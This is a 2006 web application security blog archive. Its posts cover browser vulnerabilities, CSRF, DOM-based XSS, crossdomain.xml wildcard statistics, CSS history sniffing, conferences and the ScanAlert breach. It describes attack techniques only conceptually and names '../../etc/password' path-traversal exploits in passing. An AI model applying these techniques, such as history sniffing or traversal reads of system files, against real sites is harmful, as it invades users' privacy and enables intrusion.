Tuesday, October 31, 2006

Fire Hydrant Injection

Similar to Driving off with the fuel pump, another one of those things you hear about or see in the movies, but never with your own eyes. During a trip to Santa Cruz, Ca. my wife and I happend to drive past an intersection where someone had just run over a fire hydrant. It was quite a sight. The tower of water was about 8 feet wide and reached 10 feet above the power lines! Water completely flooded the street. There was a school playground in the background and the kids we going nuts from behind the fence.




Tuesday, October 24, 2006

WhiteHat Sentinel 3.0

Warning: Shameless vendor self-promotion

WhiteHat has been working really hard on Sentinel 3.0 for over a year. Sentinel is the technology platform behind our managed service that continuously assesses the security of websites. We've released a number of cool new features, but for me the one that stands out is something we call "Inspector". Inspector is a way for us to capture the knowledge and experience of every assessment we perform. Think a wisdom of the crowds concept, but in our case, a crowd of web application security experts.

Much of a web application vulnerability assessment process is experience driven. And after performing even a few dozen assessments a person will develop a gut feel about how/where to locate vulnerabilities based upon previous experiences. Experts who perform do this work for a living will know what I'm talking about. You see a certain situation and a sixth sense kicks in saying “there is something wrong here”. If anyone else looked at that exact same thing, they might not think anything of it because they lack YOUR experience. Capturing this innate knowledge and sharing it between experts and technology has been a major hurdle. This is where Inspector comes in.

Inspector enables our security engineers to describe something interesting they’ve discovered to the Sentinel scanner that warrants further analysis (citing the reason). I’m not talking new “checks”. Inject some weird characters then pattern match, that’s soooo 2000. I’m talking abstract. Simple examples are anytime the scanner finds a ROT13/Base64/MD5/SHA1 version of your username/password in the HTML source or cookies, there’s probably something work looking at. If its sees a “SQL Where” in a URL it’s likely passing literal SQL statements. Long text strings with spaces inside form parameters named error/err/mesg/msg often point to XSS or Content-Spoofing. There are thousands of these undocumented things that over time when cataloged will make the system smarter.

Now multiply this by 1000’s upon 1000’s of assessments and you begin to understand how powerful a knowledge base this becomes. Can you tell I’m excited?

Monday, October 23, 2006

Place your bets on the first Firefox 2 vuln

On the heals of the Internet Explorer 7 release, comes the much anticipated Firefox 2.0. Officially released tommorrow. Every new major browser release brings new interest from the security research community looking for greener pastures. In IE7 the time-to-first-disclosed-vuln was under 24 hours. What do you think it'll be for FF2.0? I'll say 3 days, post your guess below.

Thursday, October 19, 2006

IE7 exploit in under 24 hours

That didn't take long. Someone was probably saving it and begins to confirm my earlier comments, 5 Tips to NOT Get Hacked Online, about Internet Explorer being an attractive target. The PoC IE 6 and 7 hack as described by RSnake says visiting a malicious web page could read data from any other website your browser can see. Hello web bank, hello web mail, hello intranet. The severity appears underrated since its really easy to exploit and the exposure here is fairly high.

Supposedly this vulnerability was known in IE6 months ago and somehow made it into IE7. Odd. Personally, I think IE7 vulnerabilities are of limited overall risk while the user-base remains small. Several months from now it’ll be a different story when migration is in full swing. As security researchers and hardcore fraudsters become familiar with the product internals the risk profile will change. The problem is while IE7 is probably far more secure than its predecessor, less bugs = good, this does not necessarily mean less risky for users.

Wednesday, October 18, 2006

Looking for security work? Hiring?

RSnake opened up a job board on slackers. This board became real popular real fast in its first two months of life. It may turn out to be a valuable resource, especially for webappsec people, to find work or a few candidates.

Monday, October 16, 2006

More on Netflix's CSRF advisory

Security researcher Dave Ferguson posted a Netflix CSRF advisory to a few mailing lists. A nice find and responsibly disclosed. Included was the ability for attacker to add movies to your rental queue, change the name and address on your account, etc etc. As Rsnake said, “pretty scary”, and a vulnerability I’ve called the sleeping giant. C-Net’s Joris Evers covered the incident, Netflix fixes Web 2.0 bugs, and described the severity of the problem nicely. There are some parts of the story that require more context. I've met reporter Joris Evers, nice guy, but as sometimes happens, important technical aspects are left out.

“The problems were repaired before they became publicly known, Steve Swasey, a Netflix spokesman, said on Monday.”

It would be interesting to know how much time and effort it took to fix the issue.

“The problems were repaired before they became publicly known, Steve Swasey, a Netflix spokesman, said on Monday. "It is an extremely remote possibility that it would have affected any of Netflix's 5.2 million members," he said.”

For the moment I’d agree about the low percentage probability. The problem is it’s hard to be sure. CSRF is really hard to spot in the logs since the attack looks like normal web server traffic. In fact, even the logged-in user is the one sending the HTTP request, not the hacker. As the criminal element becomes increasingly familiar with CSRF, we can expect increased usage of the exploit.

"Design flaws in the Netflix Web site were the cause of the relatively new type of weakness in Web applications, …. said Dave Ferguson..."


If "relatively new" means, 6-8 years or more, then OK.

"This type of attack is only suitable for a certain type of Web site. It just happens to be that Netflix is the perfect example," he said. One key thing is when the majority of users keep themselves logged in.”

Not so much. Nearly every website I’ve ever seen has CSRF vulnerabilities. The only difference between one website and another is the features present, which dictate the severity of an exploit. If a website doesn’t do anything, CSRF is meaningless. If users can log-in, change passwords, post comments, etc. then we’re talking about something more damaging.

"Netflix is audited all the time for security," Swasey said. "There was some level of exposure, although not serious." At no point was customer data such as credit card numbers at risk, he stressed.”

With CSRF, credit card numbers are not necessarily the most important piece of data. Neither are usernames and password. When in control of a browser’s authenticated access, a malicious attacker wouldn’t need that data in order to transfer money out of a bank account. Or in this case hi-jack a users Netflix account.

"Cross Site Request Forgery, or XSRF, is seen as one of the security problems that affect feature-rich Web sites. These "Web 2.0" sites often offer an experience more like using a desktop application than like using the Web."

This part and the title of the story reference the ambiguous Web 2.0 moniker. The reality is CSRF affects all websites no matter what technology version they use. AJAX, Flash, its all the same in this respect. For the rest of us, if you think XSS is/was bad and clogs the mailing lists? Just wait till the CSRF issues hit the security scene en mass.

P.S. I’m a Netflix customers, great service and gets my best recommendation!

Web Application Security Professionals Survey

Two weeks ago I sent out an informal email survey to several dozen people I know in the web application security professional services business. People from large and small organizations who regularly perform penetration tests, vulnerability assessments, train others in secure software development, write articles and whitepapers, release tools, etc. In short, the “experts”. The questions were intended to shed more light on the industry from those who live and breathe webappsec every day. Of the pool of 40, I received 21 responses, and the results are interesting. The data set is small, so be careful reading too deeply into the results.

Thanks again to all those who took the time to fill out the survey. I got a lot of informative comments in addition to the answers. It would be insightful for readers to know the names/organizations of those polled, including what their comments were. But I promised not to release their personal information. However, they themselves are more than welcome to re-post their thoughts and comments.

1) How many web application security assessments will you perform in 2006?
a) None (0%)
b) 1 - 10 (0%)
c) 10 - 25 (57%)
d) 25 - 50 (29%)
e) 50+ (14%)




2) What vulnerability reporting standard do you utilize most often?
a) Web Security Threat Classification (WASC) (14%)
b) OWASP Top Ten (0%)
c) Common Vulnerabilities and Exposures (CVE) (10%)
d) Proprietary (57%)
e) Other (19%)





3) Do
you use commercial web application vulnerability scanners during security assessments?
(SPI Dynamic's WebInspect, Cenzic's Hailstorm, Watchfire's AppScan, Acunetix Web Vulnerability Scanner)
a) Never (71%)
b) Sometimes (24%)
c) 50/50 (0%)
d) Most of the time (0%)
e) Religiously (5%)



4) Average number of man-hours required to perform a thorough web application vulnerability assessment on the average commerce website?
a) None (0%)
b) 0 - 10 (5%)
c) 10 - 25 (10%)
d) 25 - 40 (0%)
e) 40+ (86%)






5) Do you recommend Web Application Firewalls?

(ModSecurity, Imperva's SecureSphere, NetContinuum's NC-1100, Citrix Application Firewall, etc.)
a) Yes (14%)
b) No (10%)
c) Sometimes (76%)





6) What do you think about the updated PCI Data Security Standard v1.1?
a) Huh? (0%)
b) It's stupid and means nothing to me (0%)
c) Step in the right direction (57%)
d) Great for the web application security industry! (0%)
e) Other (43%)





7) Checking for XSS on public websites without permission?

a) Legal (24%)
b) Legal, but unethical (19%)
c) Illegal (10%)
d) Don't know (Grey area) (48%)

Wednesday, October 11, 2006

Making a secure web browser

A couple of browser security and vulnerability articles posted today. "The False Promise of Browser Security" was a good read (yours truly quoted), but something from Computer World's got my attention, "What if I don't want IE7?". Isn't that the age old question I thought to myself. At the end the author says..

"I'm torn on this issue: IE7 is more secure than IE6 (how could it not be?) and I think the majority of home users do need to upgrade. But making it a mandatory upgrade as soon as it's publicly available strikes me as draconian and premature. I don't like having major upgrades to something as fundamental as my browser forced on me. Especially when I know IE7 is going to break things."

Forcing the update of "fundamental" software. That's an important point since people will be unable to do their testing to make sure their day to day productivity won't be impacted. Let me stop there. I'll take a wild guess and say I think people are tired of listening to me bag on Internet Explorer. In fact, I'm tired on hearing myself speak talk about it. What I would like to speak about is the difficulty of building a web browser.

Consider what web browser developers have to put up with ever day. The stupid non-compliant HTTP web servers do with the protocol. Must support half a dozen client-side programming languages, with several variants each, all potentially harboring malicious code. Developers clamoring for standards compliance, then ticked off when you do. The environment is completely hostile and browser vendors have to make the best of it. Billions in revenue depends on it.

Is there any wonder web browsers are a top target for malicious hackers?

Top 5 signs you've selected a bad web application package

As posted by Robert Auger (cgisecurity.com), a funny and somehow insightful list.

5. The vendor's idea of a patch process involves you editing line X and replacing it with new code
4. The amount of total downloads is less than the application's age
3. It isn't running on the vendors homepage
2. The readme file states that you need to chmod a certain file or directory to 777 in order for it to work
1. If the application name contains 'nuke' in it, you're pretty much screwed.

Predictions of DOM-Based XSS

More than 10 years ago the industry became aware of smashing-the-stack buffer overflows. Many exploits later, these issues became harder to come by in popular software. The industry then moved onto heap overflows in pursuit of greener pastures. Once the grass was eaten up, the next evolutionary step occurred, integer overflows came to be identified more often. My prediction for the next 3-5 years is DOM-Based Cross-Site Scripting (XSS), credited to Amit Klein, vulnerabilities will follow a similar path.

Today the vast majority of XSS vulnerabilities fall into the persistent (HTML Injection) or non-persistent (link click) variety. I expect most of these issues to be cleaned up on major websites. If fact I see this trend already as people become aware of the dangers. From there it’s reasonable to assume DOM-based XSS will grow in interest, where currently it lays in wait. For how long is the question.

DOM-based XSS has the spooky trait that the script injection does not traverse over the network. Meaning, web applications and web application firewalls are unable to filter or to block the attack. The vulnerability is actually burried inside the JavaScript code. We'll soon have to deeply educate ourselves on how best to spot these issues both by hand and through automated means. At the moment we have to sift through seas of JavaScript code, ugh.

As far as the next type of XSS, its has yet to be identified. ;)

Tuesday, October 10, 2006

Methodology for Comparing Web Application Vulnerability Assessment Solutions

Measuring the time difference for a web application security expert to hack a website before and after implementing a WAVA solution.

Priority one in web application security is ensuring websites do not get hacked. Everything we do security-wise should be designed to meet this goal. If vulnerabilities exist in websites we’re responsible for, we need to find and fix them quick before ending up on the front page of Slashdot or the Wall Street Journal, on full-disclosure’s or sla.ckers.org’s wall-of-shame, or much worse by a call from the FTC. Scanners, assessments, and managed services are the 3 options organizations have when shopping for solutions to identify web application vulnerabilities. The challenge we have in the industry is how to go about usefully comparing Web Application Vulnerability Assessment (WAVA) solutions.

No website is 100% secure, at least not all the time, but there are ways to measure its security resilience and the improvement over time. This capability can be used to compare the effectiveness of WAVA solutions. WAVA solutions improve security by identifying vulnerabilities so they can be resolved before being exploited. Using this data we can begin answering the question, “how hard does the WAVA solution make websites to hack”? As such the more time, effort, and skill required to hack a website after implementing a given solution the more effective it is. The premise being is that it only takes the use of a single vulnerability to compromise a website and defraud its users.

With feedback from the community I’m hoping to improve upon the methodology to make it useful for best-practices, enterprise bake-off’s, magazine reviews, analyst reports, consultants advice, etc. Thanks to Richard Bejtlich (TaoSecurity), Robert Martin and Christy (MITRE), and RSnake for their assistance in vetting these ideas.

Definitions
o Hacker: Web application security experts with at least two years of experience in identifying and exploiting vulnerabilities.
o Hack/Vulnerability: Exploitable web application vulnerability (WASC Threat Classification) of Level-3 severity or greater under the Payment Card Industry (PCI) Severity Rating Chart.
o Test Website: A website with at least 5 or more vulnerabilities.

Assumptions
o It only takes the use of a single vulnerability to compromise a website and defraud its users.
o If the website requires login, the hacker is provided at least one test account.
o Hacker may use any tools or information gathering resources at their disposal (scanners, proxies, browser, Google, etc.).

Procedure
(Repeat procedure for 6 hackers on 6 different test websites while alternating the WAVA solution for each website)

Step #1
Hacker attempts to find a vulnerability in the website. Measure the amount of time it took for identification. (T1)

Step #2
Run the WAVA solution to identify vulnerabilities.

Step #3
Note whether or not the solution identified hacker found vulnerability from Step #1. (V1)

Step #4
Resolve all identified vulnerabilities.

Step #5
Hacker attempts to find a vulnerability in a website. Measure the amount of time it took for identification. (T2)


Data Chart


Deliverables
o All raw data charts.
o Average years of experience for the hackers.
o Average T1 time.
o Percentage of time the WAVA solution identified V1.
o Average delta between T1 and T2 for each WAVA solution.

Jeremiah thanks RSnake

While obnoxiously basking in my new Google glory, I failed to notice that RSnake wasn't on their security thank-you list. He's had a colorful relationship with the Google in the past and unfortunately not everyone gets the credit they deserve. I know this well having been plagiarized more times than I care to remember. The fact is RSnake is a brilliant security guy and technologist. He’s helped me on countless occasions with webapp hacks, including some with Google and others never to be named. Few are as passionate and contribute more to the infosec community than him.

The thing is in this industry we're too often preoccupied with being overly critical of new ideas and paranoid of our peers. Possible does not necessarily mean probably and we pay for that attitude. And every once in a while its good take the time to commend those who's work we come to rely upon. RSnake deserves thanks for the XSS Cheat Sheet, sla.ckers.org board, informative blog, new ideas, and eclectic humor. Now get back to work you primadona!

NIST's XSS Hall of Shame

Notice: NIST.org (Network Information Security & Technology News), is not related to NIST.gov (National Institute of Standards and Technology)

Kevin Overcash (Breach Security) and RSnake's blog brought NIST.org's Cross-Site Scripting (XSS) Hall of Shame to my attention.

Kevin's words: "Following up on the XSS disclosure list on sla.ckers.org, the NIST.org has begun maintaining a list of commercial and government web sites that have been reported to be vulnerable to cross-site scripting attacks. ... It appears that NIST will maintain this site over time and provide organizations with the ability to remove themselves from the list when they demonstrate they are no longer vulnerable. NIST will verify the eradication of the vulnerability and remove sites that secure themselves. There are quite a few large organizations listed here. I believe that this is an important step in disclosure that may or may not have legal problems. For the moment, it serves as a significant wake up call to businesses. Everyone is vulnerable and the hackers know it."

When there's talk of legal issues regarding the discovery and disclosure of XSS vulnerabilities, I'm reminded of the a funny line from the movie Kingpin.


mp3

Roy: Is this legal Mr. McCracken? Big Ern: I don't know, it's fun though isn't it!



Monday, October 09, 2006

crossdomain.xml statistics

I've been reading Chris Shiflett's blog on Dangers of Cross-Domain Ajax with Flash and crossdomain.xml insecurities. This area could potentially make Cross-Site Scripting (CSRF) and Cross-Site Request Forgeries (CSRF) issues a lot worse. A lot depends on the circumstances, but its time to learn a little bit more about this. For background...

As in JavaScript/AJAX, Flash Players are restricted from placing asyncronous HTTP requests to off-domain url's. (same-origin policy) For example, a Flash movie hosted on www.foo.com cannot place requests to www.bar.com. The policy prevents malicious Flash movies from compromising sensitive users data on other websites, but also hinders development of cool new website mash-ups (without relying on a server-side proxy). This is where crossdomain.xml comes in. crossdomain.xml is an XML policy file that gives Flash Players specific permission to access data from a given domain.

http://www.foo.com/crossdomain.xml
< ?xml version="1.0"?>
< !DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<>

< domain="www.bar.com">

< domain="*.foo.com">

< /cross-domain-policy>

< domain="www.bar.com">
Says Flash Movies on www.bar.com can make asyncronous HTTP Requests to www.foo.com

< domain="*.foo.com">
Says Flash Movies anywhere on foo.com can make asyncronous HTTP Requests to www.foo.com

< domain="*">
Says Flash Movies from anywhere can make asyncronous HTTP Requests to www.foo.com. This looks particularly dangerous.

Check this Flash Player TechNote snippet says about it:
"This practice is suitable for public servers, but should not be used for sites located behind a firewall because it could permit access to protected areas. It should not be used for sites that require authentication in the form of passwords or cookies."

Fair enough, but who reads the docs anyway. Let's say you XSS somebody on www.hacker.com to load in a malicious Flash Movie. That movie would have full domain access to www.foo.com provided the wildcard config was in place. One of my first questions was ok while interesting, this is obscure technology, is unlikely to be widely deployed. As such, of nominal risk to the enterprise. To make sure I ran some tests on the websites of the Fortune 500 and the Alexa 100 (US). Here are the stats:



I was surprised at the results. A total of about 8% of the Fortune 500 have crossdomain.xml policy files and 2% of those were wildcarded for any-domain. The Alexa 100 was even more pronounced. About 36% have crossdomain.xml, 6% of which are wildcarded for any-domain. This says to me the risk is there and will likely grow.

Sunday, October 08, 2006

Thanked by Google Security


Google recently updated its Security and Product Safety page and in doing so took the time to thank several people, including me! Very cool. This page offers guidance on how to contact Google to disclose vulnerabilities and report hacking incidents. If your a security researcher, this goes to show that responsible disclosure does work, especially when working with responsible companies.




BlackHat Japan 2006

BlackHat Japan 2006 was the 10th show I’ve been invited to attend. “Hacking Intranet Websites from the outside”, was an encore performance to the USA show. If you were in Vegas or downloaded the video, you didn’t miss anything. Unless of course you enjoy listening to speakers talking at half speed while being simultaneously translated U.N. style. That’s an experience in and of itself. Just as in the U.S., web application security and Windows Vista were the main topics of interest.

The international BlackHat’s offer something unique from the U.S. shows. They tend to be smaller (maybe 200-400 people), intimate, get to spend more quality time with the speakers and attendees, and able to sit in on more talks. All in all they are a lot of fun. This year I met people from all over including New Zealand, Poland, Israel, Canada, Singapore, and of course the U.S. and Japan. BlackHat Japan easily wins the award for the best-dressed show. 90% of the attendees are in black suits, white shirts, and ties. Only us speakers bucked the trend in our button down garb.

I’ve been to Tokyo several times before and always found it to be a fascinating city. The service is impeccable, total culture shock, Coke is smooth (real sugar), food is amazing (Shabu Shabu!), technology is a generation ahead of anything we have in the states. Akihabara rocks! Grifter described it best, that at night some places feel like you’re in Bladerunner. The only part had my mind bent was the never-ending sea anime everywhere, blech. I took a lot of pictures:



Another conference badge for the collection



Conference posters and Tom strikes a pose



I have no idea, somewhere off the Harajuku train stop.


When Sacha Faust is not being chased by Japanese women wearing short skirts and knee high leather boots.. he’s drinking Sapporo and modeling cell phones.


Think 2600, with about 100x more content. Check out my new anti-virus charm too!


Check out GQ’ed up iSEC Partners hangin out before the Black Hat after party. Oddly similar style of clothes to Tom Cruise in Collateral. Fortunately they didn't try to convert me to scientology.


Gee, Brain, what do you want to do tonight?" "The same thing we do every night, Pinky: Try to take over the world!". Jeff Moss and KS.


Instead of Dance USA


Rain and high winds took a toll on the umbrella population


Dan Moniz answering question from Kanatoko from Jumperz.net


Like a kid in a candy store, Akihabara has all the gadgets you could ever want.


The attendees and the translation booth in the back of the room

Wednesday, October 04, 2006

Evolution of the Web Application Security World

Last week I attended a happy-hour party generously sponsored by iSEC Partners. About 40 showed up from all over silicon valley including Google, Seimens, IGN, eBay, Fortify, Adobe, etc. I met several thought provoking people, many said they knew of me and enjoyed studying my work. Cool! Conversation revolved mainly around web application security, since that’s what’s on everyone’s minds. We talked of new hacks, defense strategies, war stories, what the bad guys are up to, and of course plenty of vendor gossip. The amount of lucid webappsec discussion occurring in the physical world is, in a word, inspiring.

Then, just when I think I know something, someone says something that alters my view of the world. Two separate people said they learned about Cross-Site Scripting (XSS) in college! SQL Injection too. C’mon your joking right!? I guess this makes sense, but I was completely blown away. When at I first looked at institutions of higher learning it was lucky to find one class on infosec. Mostly about encryption, how firewalls worked, and the CIA model. Nothing webappsec related, let alone covering XSS. The underground had been playing around with what later became known as XSS since 1996. Not quite 30, I instantly felt like the old man of webappsec. Walking to school, up hill, both ways, in the snow. :)

For those who remember, the world was much different only a few years ago. Web application security was barely a term, in fact, most called it “CGI Security”. Remember? Back in the time of phf, IIS Unicode, and ../../etc/password exploits. When everyone thought firewalls and the tiny lock symbol would safeguard us. Network security gurus shunned the few of us who knew better and ignored arguments to the contrary. And besides how dangerous could a scripting language like JavaScript really be? HTTP monkeys weren’t taken seriously, but this didn’t stop us from walking in and out of just about any website we wanted. That part hasn’t changed much.

What has changed is a vast improvement of widely disseminated knowledge and awareness amongst the masses. Web application security is no longer a dark art only known to a select few insiders. Industry conferences take place all over the world and webappsec speeches are commonplace. (In fact I’m in route to Black Hat Japan as I write this post.) Practitioners seeking technical training have only to ask. Novices, with no more skill beyond they’re web browser, can easily master powerful tricks-of-the trade. Organizations truly desiring security for their websites have what they need to protect themselves. While the industry still has a lot of work ahead, I see real progress.

I'll take some pictures of Tokyo while I'm here and post later.

big brother is watching and taking notes

Robert Auger from CGI Security spells out how a website could easily profile your interests from a competitors website enabling them to market to you better. Based on the JS/CSS History Hack, Robert describes the following:

"Lets say VisitorA visits your site www.sitea.com. You can use the CSS history stealing trick to see if they have visited www.siteb.com and/or www.sitec.com. If they have also visited a competitor you'll know that this person is semi serious about whatever reason they are visiting your site for. Using the same CSS trick you could also enumerate a list of links (only enumerated if the link was visited) against each competitor website to see what they viewed on this site. This could include seeing which products/services they are interested in, if they visited the 'contact us' page and possibly if they also visited the 'thank you for submitting your data'."

This is a very probable scenario. In my tests, its possible to check for over 2,000 url's in under a few seconds without any noticable browser performance issues. More than enough resources for a website to conduct some decent profiling metrics.

Robert asks..."This begs to ask the question is this legal?"

I think so, but don't know for sure. Maybe this could be considered an improvement on referer checking. :) Though the more compelling question is, are people doing this already and we're not noticing? Either way, time to protect yourself. Check out Stanford SafeHistory.

Tuesday, October 03, 2006

93,754,333 private records lost and counting

Thank you to Dennis Groves for passing this story along...

Data breaches near 94 million
"Less than two years into the great cultural awakening to the vulnerability of personal data, companies and institutions of every shape and size -- such as the data broker ChoicePoint, the credit card processor CardSystems Solutions, media companies such as Time Warner and dozens of colleges and universities across the land -- have collectively fumbled 93,754,333 private records. Or at least that's the rough figure tallied so far by the Privacy Rights Clearinghouse, a consumer advocacy organization in San Diego. far."

This number is simply astounding. I mean, there are only roughly 300 million americans. Is this nearly 1 in 3? There is probably some overlap in the numbers, but wow. Businesses, consumers, security vendors, governement, watch groups all share part of the day to day responsibility for privacy protection. We have the technology, methodology, best-practices to make a real difference. We have everything we need except legislated responsibility. And that's the problem. Everyone's motivation is simply not in alignment. With that, no way things can get better.

Maybe the situation will get so bad (with privacy, security, identify theft, terrorism, copyright, patents, corruption, global warming, gas prices, etc.) we'll have no choice but to start doing the right thing. That's the safe bet, everything seem to work that way so far.




Monday, October 02, 2006

Just when you think its over, ScanAlert drama

Brian Bertacini from AppSec Consulting clue me into this story. This snippet kicks off the story...

ID Thieves Turn Sights on Smaller E-Businesses
"After scanning the search results, he purchased the inexpensive item -- a USB cable used to synchronize the Treo's settings with his personal computer -- from Cellhut.com, the first online store displayed in the results that looked like it carried the cable. The site featured a "Hackersafe" logo indicating that the site's security had been verified within the past 24 hours. Later that day, information from Cole's purchase --- including his name, address, credit card and phone numbers, and the date and exact time of the transaction --- were posted into an online forum that caters to criminals engaged in credit card and identity theft."

ScanAlert Inc., a Napa, Calif.-based company, scans over 75,000 online merchants each day for thousands of known Web site flaws. According to the story ScanAlert is investigating the breach. Of course one would think that law enforcement would be performing this task. We'll have to wait and see for sure if this was a web application hack or something else. But if you look at the published statistics, a web security attack is the smart bet.

"According to a report released this month by VISA, four-out-of-five of the top causes of card-related breaches were digital security weaknesses common at merchants large and small, including missing or outdated software security patches, misconfigured Web servers, and the use of vendor-supplied default passwords and settings, all of which are a violation of new payment card industry standards."

Several experts weighed in with their thoughts. Most of which were the normal best-practice stuff, but this one caused me to pause.

"Having one of these scanning services in place is definitely better than nothing because a lot of small and medium sized online stores don't have the staff in place to make sure their applications are secure," Jason Lam, who teaches a course on securing Web sites for the SANS Institute.

Normally I would agree doing something is better than nothing. This might be a different situation. If a scanning vendor tells you they scan for vulnerabilities which they are clearly not finding, then all you've bought is a false sense of security. The bad guys quickly figure out that any business carrying the logo probably in fact has vulnerabilities because the reports say otherwise!

My question is since ScanAlert is a certified PCI scanning vendor, what does this say about enforcement of the PCI standard? I've talked about this problem in the process before. And then also what does this say about the rest of ScanAlert's 75,000 customers? Maybe its just as the logo suggests, "safe for hackers".